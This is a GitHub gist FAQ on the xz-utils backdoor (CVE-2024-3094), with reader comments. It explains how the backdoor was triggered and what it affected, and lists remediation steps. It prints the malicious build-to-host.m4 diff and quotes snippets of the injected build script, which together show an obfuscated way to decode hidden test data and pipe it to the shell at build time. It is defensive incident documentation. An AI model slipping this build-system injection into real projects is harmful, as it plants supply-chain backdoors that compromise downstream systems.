Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active December 3, 2024 05:06
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@duracell
Copy link

duracell commented Apr 4, 2024

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

So, unless you really know what you're doing, IPv4 is the only way to go. Because being behind NAT gives a default opt-in behavior to accepting connections. On other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately to public internet.

And xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to public internet).

The device which does NAT on IPv4 could and in all cases I know is also the device which does the filtering for ipv6 and on default on all consumer products does not allow any incoming connection request. So you have the same firewall security as with NAT but not the problem of port translation and other problems.

@Daniel15
Copy link

Daniel15 commented Apr 4, 2024

Some of the commit links still go to the GitHub mirror at https://github.com/tukaani-project/xz/, which is still disabled. It'd be worth updating the links to go to the upstream repo, e.g. https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

@redcode
Copy link

redcode commented Apr 4, 2024

Has anyone tried to contact Chien Wong? He could have spoken privately with Jia Tan, and if so, he could have tried to communicate with him in Chinese. That might lead us to some other possible clue.

@dnorthup-ums
Copy link

@sectosec

The serious part is that the guy name Neustradamus also pressured to push libzma update to 5.6.0 check : microsoft/vcpkg#37197

FWIW: microsoft/vcpkg#37199 (comment)

I have no assessment either way, but just thought it worth noting...
Then again, I've also managed to get banned from gulp for pointing out that they were shipping insecure code. I've been a FLOSS project lead before so I know it can be ultra hard to figure out who to trust and how much to trust them. (This is my $Dayjob github account, not my personal one...any much of my involvement in Open Source stuff predates github anyway.)

@AdrianBunk
Copy link

Just came here to throw some links :

When someone creates a Github account solely for smearing another user, then the most suspicious person is the accuser.

After a quick look I would agree with opinions expressed elsewhere that the accused person is a bit weird, but the only connection with xz is one xz update request in one project.
"weird" includes "opened 2900 Github issues/MRs in the past 5 years", so when the accuser found a case where "a 2nd account comes in and asks for the feature" 3 months later there's no surprise that this has happened somewhere.

It would be good if everyone here refrains from participating in a witch hunt based on anonymous smearing.

@donington
Copy link

As much as I have loved the discussions brought up in this thread, I would like to see it become more centered on the task at hand - the xz code situation. Everything that people have been mentioning is interesting, but a lot of it has lost focus on the task here.

I'd like to try to submit as fact that sshd was targeted. Not because it provided weakness directly. The sideline was from an outside code base, mostly patched in. The flaw was partially how it was a network service that provided an in - the listening socket.

@christoofar
Copy link

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem.

I'm not trying to "defend the BSDs" here. So don't look at it that way. Again, there's not a realistic magic thing that will stop unwanted hotloading, not even over at the "secure" OSes.

xz has taught me to get more bitchy about hotloading that I don't like. I feel that anyone sassing someone for asking "Why did you bring that in?" whether it's a FOSS discussion or at work, etc... the dev themselves are a red flag. Just explain why you brought the dep in and if you see the "ugh.. maybe a security concern?", then do the research. Look and see. Stop being a jerk.

Trying to play this unitary blame game thing is going nowhere, so we meet here.

The fact that tests were done on an compromised system with all the necessary conditions/ingredients, but sshd was started manually and no backdoor was found seems to have gone over everyone's head.

On the RE chats/discords the resistance the .o has to observing it and a great find that endbr calls are really being used as tokens to locate the calling points is genius.

(S/O to Stephano for figuring out how the locator works https://smx-smx.github.io/xzre/xzre_8h.html#details)

Meanwhile, everyone is talking xz/lzma, distros are rebuilding packages, but zstd is being built from, or hasn't since 3/29, from a preconfigured github tarball with lzma enabled (or is it not everyone doing this?).

libsystemd also put dlopen() around zstd too. This backdoor is one of the most craftiest things ever to have been written. Every decompiler shop is going to be studying this for months/years. We may need to be thinking of asking the chipset makers themselves for help. No doubt many of them too have also been thinking about this, and worried about their own machines they run.

You wanted automation and less sysadmin work, you looked down at custom scripts to setup services, .. here it came. If you leave honey out the bees and the ants will come.

Amen. Also did you notice OWASP themselves got a breach? https://therecord.media/owasp-foundation-warns-of-data-breach-resumes

@thesamesam
Copy link
Author

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@christoofar
Copy link

christoofar commented Apr 5, 2024

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@thesamesam 10-4.

On the RE effort, I am wondering in the dumpouts that Jia saw from Gentoo/Debian that one of the x86_64 registers was being used as a debug marker.

Force flipping registers (but for Jia, its going to be in an obfuscated way) is a common technique in old assembly programming, back when computers had big light boards and a STOP/RUN switch somewhere where you could inspect values by hand, we all know. Focus has been so much on hunting down all the symbols, but now I think valgrind with the full register dump turned on across a bunch of projects that screamed in 5.6.0 might reveal something that's been missed. I'm off to go work on that and shut up on here :-)

@Leseratte10
Copy link

I don't think there's currently any hints that the malware itself is doing that - but if you had the SSH port exposed it's possible that the attacker has abused the malware to get code execution on your machine and could then have installed or changed whatever he wanted, so if you want to be absolutely safe you'd need to reinstall.

@fiorins
Copy link

fiorins commented Apr 5, 2024

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

@AdrianBunk
Copy link

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

Please read the "Design" section in the FAQ where this topic is explained.

(And note that the tiny part of the backdoor that was only in the release tarballs could as well have been in git like the rest of the backdoor - everything in git was also under control of the attacker.)

@rifkidocs
Copy link

just want to leave a trace here

@ZacharyDK
Copy link

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

@AdrianBunk
Copy link

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

Read the links under "Analysis of the payload", where people discuss the payload and how they have analyzed it.

@anzz1
Copy link

anzz1 commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to kernel nor core utilities. Stability and safety is much more important than new shiny features especially if Linux is to be the stable foundation for server and embedded applications running critical code in the future too. I really hope any people bullying maintainers to accept patches and new features to already perfectly functioning tools will be called out more often. If you desperately want a new feature, fork it and make your own.

I hope that people would understand to look back into what Linux was and what the core idea of it is, which I would describe as a collection of simple utilities (GNU) and the kernel to support them. Not anything else, everything that is complex, hard or time-consuming to audit, new feature that is controversial, should not be included in either the kernel, core utilities or major distros as default. You are not supposed to create these large monoliths like systemd which span their tentacles to the entire system and introduce not only a complex large codebase addition but also a single point of failure.

I also hope that the reflection from this isn't that we need more idiotic "mitigation" security features like AppArmor, position-independent-executables, stack canaries/protectors and such other band-aid "fixes" which create additional complexity that does not only hurt performance but is also fertile ground for new security holes and bugs to fester.

The only sane and safe way is to make the kernel and core utilities simple and lean so they are easy to audit, lift your foot from the pedal a bit so everything can be checked at least with several sets of eyes before moving forward. There is no need for any "mitigations" when the code itself is safe.

Also the whole community needs to not succumb to any person's or group's vanity who push hard to get their personal pet projects merged into the foundation that everyone uses. As much software as possible should be built on top of Linux, as packages which can be installed like it has always been, not into Linux either in the kernel or as kernel patches included by default in major distributions or packages installed by default. The more "blank slate" a base Linux installation is by default, the better off is everyone is. This is especially true for distributions which are focused on serious use like Debian. Most people and in turn infrastructure they create use major distributions as a base, so the decisions made by major distributions also have a great impact, so not only must the kernel team be vigilant.

If you look at the kernel mailing list, Torvalds has been active in fighting against the tide of many people trying to push all kinds of bullshit into the kernel source tree. But the major distributions to my (limited) knowledge doesn't have such a strong gatekeeper and all the distros are getting increasingly bloated and include more and more unnecessary features by the day. Also Torvalds will eventually retire, what will happen then, who will fight against the tide? That not also makes me scared for the future of Linux, but also shows that it's not a good idea to rely on a single gatekeeper to keep all the bullshit out. I mean over a decade ago, there was a serious push to move the linux kernel to use C++, which Torvalds promptly stopped in its tracks, thank god. Where would we be without people pushing back and wanting to contemplate first? We need more of those people as maintainers in the OSS community, the critical thinkers and slow and steady types.

How could the OSS community at large have the reflection when it comes to critical foundations that everything needs to be handled with proper care, which means taking your time, and not every feature needs to make it in just because it's new and shiny? The problem at large is that the group who want "feature X" to be added are usually loud and obnoxious and push hard while most people who think "is this really necessary" will not either out of politeness say anything or do not care enough. Then even when maintainers think so, it's easy to have the psychological effect of "oh, this must then be what people really need" and get bullied to merge a new feature in without proper checks and balances. Rinse and repeat a hundred times and suddenly the distribution got much more bloated and harder to audit since a hundred new features were added each of which some person might just maybe need sometime has been added as default.

TL;DR; Everyone who is a developer in any critical software work like kernel, core utilities, major distributions of Linux, etc., take your time. The world will not end if a new feature doesn't get added in tomorrow. It just might though if you add something in a hurry. You don't owe anyone anything, especially not someone bugging you to immediately add a "feature X" because some small subset of users might want to use it.

@Z-nonymous
Copy link

Z-nonymous commented Apr 5, 2024

Wait until snaps and flatpaks are properly exploited. 😂

@Aqa-Ib
Copy link

Aqa-Ib commented Apr 5, 2024

Well said anzz1. You even can extrapolate what you said to everything that human society do. It is practically impossible to stop this crazy development that we have as a whole. However, those individuals who make things carefully can be of great value for our future.

@Daniel15
Copy link

Daniel15 commented Apr 5, 2024

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

GitHub already has built-in support for generating tarballs based on a tag (for example, https://github.com/Daniel15/prometheus-net.SystemMetrics/archive/refs/tags/v3.1.0.tar.gz). This is guaranteed to match the code in source control.

The issue is that sometimes the tarballs legitimately differ from the repo contents, particularly if the project uses automake. However, this is not ideal, and projects should strive to have reproducible builds, meaning the code to build the project is exactly the same as the code checked in to source control, and building the code from source always produces the same binary (so anyone can build the project from source to verify that a precompiled executable was built from the same source code, as it'll be exactly identical). One of the more common issues with achieving reproducible builds is timestamps, for example if the current build time is embedded in the executable.

Having said that, as others have mentioned, that wouldn't have helped here. The attacker was in full control of the source control repo, and could have just put everything in there rather than just in the tarball.

@Daniel15
Copy link

Daniel15 commented Apr 5, 2024

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

@bogd IPv6 does help though. Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56), and you can run your SSH server on a random IP in the middle of the range. Just stick the IP in an internal-only DNS zone and don't expose the DNS record publicly. That's far less likely to be found during a scan, compared to IPv4 where the entire public IPv4 range can be scanned in 5-15 minutes (https://github.com/robertdavidgraham/masscan).

Sure, it's security through obscurity and thus isn't a proper security measure, but I've been running a honeypot server in one of my /64 ranges for a few years and so far nobody has hit it. IPv6 traffic to some of my sites is around 45% of total traffic, so people are using IPv6 otherwise 🙂

@ormaaj
Copy link

ormaaj commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to kernel nor core utilities.

This was caught as early as it was thanks entirely to the abundance of people testing new release code in a wide variety of environments. That is made possible by downstream distributors that integrate test packages into their systems so they are easily available. Testers of upstream prerelease code had no opportunity to find this.

This is the system working exactly as it should.

@fatience
Copy link

fatience commented Apr 6, 2024

Neustradamus's behaviour is indeed suspicious.
https://news.ycombinator.com/item?id=39868682

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Someone more experienced with this should definitely take a look.

@bogd
Copy link

bogd commented Apr 6, 2024

@bogd IPv6 does help though.

No arguments there - it does help, it's just not the panacea that some people think it is :)

Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56)

There's a very nice conversation here about how allocating 1 trillion times the entire IPv4 address space for a single server is "a good idea" (TM), and I am old enough to remember the days when we allocated an IPv4 /8 for a single network, because "the address space is so large, it is practically infinite". But as I was saying, I do not want to sidetrack this conversation and go into other topics - the original topic is far too important.

Sure, it's security through obscurity and thus isn't a proper security measure

That was my entire original point. Maybe that, plus what others have added:

  • IPv6 would not have protected against an application-level backdoor
  • this attack does not look like something that would be used against random targets, discovered during a "routine" scan. Looks more like something one would save to use against extremely high-value, known targets. I know, assumption, but... not an illogical one.

@AdrianBunk
Copy link

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

You should read the links provided by this person, these are proposals for upcoming internet standards.

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Mozilla accepted an implementation from someone else that implemented a major part of the original request, this is a strong indication that the request made sense.

please do not respond to closed bugs asking for additional features. Please file a separate bug for new features.

That's a very common mistake, nothing suspicious about that.

behaviour is indeed suspicious.

It can be really harmful when people who clearly have no experience interacting with users in open source projects are making such bold accusations, it happens far too often that a brainless internet mob drives innocent people into suicide.

@thesamesam
Copy link
Author

thesamesam commented Apr 6, 2024

I am familiar with that person (I don't know him) and my take has always been that he's enthusiastic but ends up irritating a lot of people (me included) because of how he goes about things. I don't think he's malicious, just ends up causing hassle for FOSS maintainers. This situation is cause to pause and reflect on behaviour but I don't think people should be chasing after him.

@Chestnuts4
Copy link

Chestnuts4 commented Apr 6, 2024

Sorry, I want to know how can I get xz.5.6.1.tar.gz, then I can diff it as same as you

git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4

@Chestnuts4
Copy link

xz-5.6.1

which place can I download former build-to-host.md, I get xz-5.6.1.tar.gz from github

@thesamesam
Copy link
Author

thesamesam commented Apr 6, 2024

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.

@Chestnuts4
Copy link

@thesamesam thanks for you reply, I got original build-to-host.m4 from github, and success diff it

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment